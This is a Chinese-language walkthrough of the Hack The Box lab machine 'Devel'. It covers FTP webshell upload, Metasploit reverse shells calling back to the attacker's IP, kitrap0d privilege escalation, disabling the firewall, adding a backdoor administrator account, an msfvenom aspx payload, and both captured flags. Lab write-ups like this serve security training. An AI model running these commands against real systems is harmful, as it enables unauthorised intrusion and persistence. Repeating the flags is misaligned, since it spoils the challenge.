本次所使用的工具
nmap(zenmap)、remmina、冰蝎、FileZila(连接ftp的图形界面工具)
Devel - 10.10.10.5
2019年9月5日 11:02:45
1. 信息收集
nmap -T4 -A -v 10.10.10.5
开放21和80端口。
80端口访问后未IIS 7.5默认页面。
2. 获取Webshell
FTP存在匿名访问,FTP根目录为IIS的Web页面根目录。
使用FileZilla连接FTP后,上传冰蝎的Webshell到IIS路径下。
冰蝎客户端连接成功,查看当前用户,用户为web。
3.提权
用户为普通账号权限,无法进行账号添加及查看管理员文件的权限,尝试提权操作。这里使用MSF尝试进行提权。
开启MSF监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.16.66
冰蝎客户端i填写IP和端口,进行连接
MSF成功获取反弹Shell。
使用local_exploit_suggester模块获取提权建议
#将当前会话放入后台
background
use post/multi/recon/local_exploit_suggester
set session 1
set showdescription true
run
执行后获得多个提权建议,尝试使用ms10_015_kitrap0d
use exploit/windows/local/ms10_015_kitrap0d
set session 1
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.16.66
run
执行成功后,得到SYSTEM权限。
4.开启远程桌面
修改注册表,开启远程桌面
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
关闭防火墙
NetSh Advfirewall set allprofiles state off
添加管理员用户
net user hacker P@ssw0rd /add
net localgroup Administrators hacker /add
远程桌面开启成功
5. 登陆远程桌面,查找flag
先再资源管理器点击下Administrator等账号的文件夹,获取访问权限。
6. flag
root:e621a0b5041708797c4fc4728bc72b4b
user:9ecdd6a3aedf24b41562fea70f4cb3e8
7. MSF生成Webshell
生成一个aspx格式的Webshell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.66 LPORT=4444 -f aspx > shell.aspx
生成的文件上传到服务器,开启MSF进行监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.16.66
run
浏览器访问http://10.10.10.5/shell.aspx,触发反弹shell,msfconsole成功获取到会话。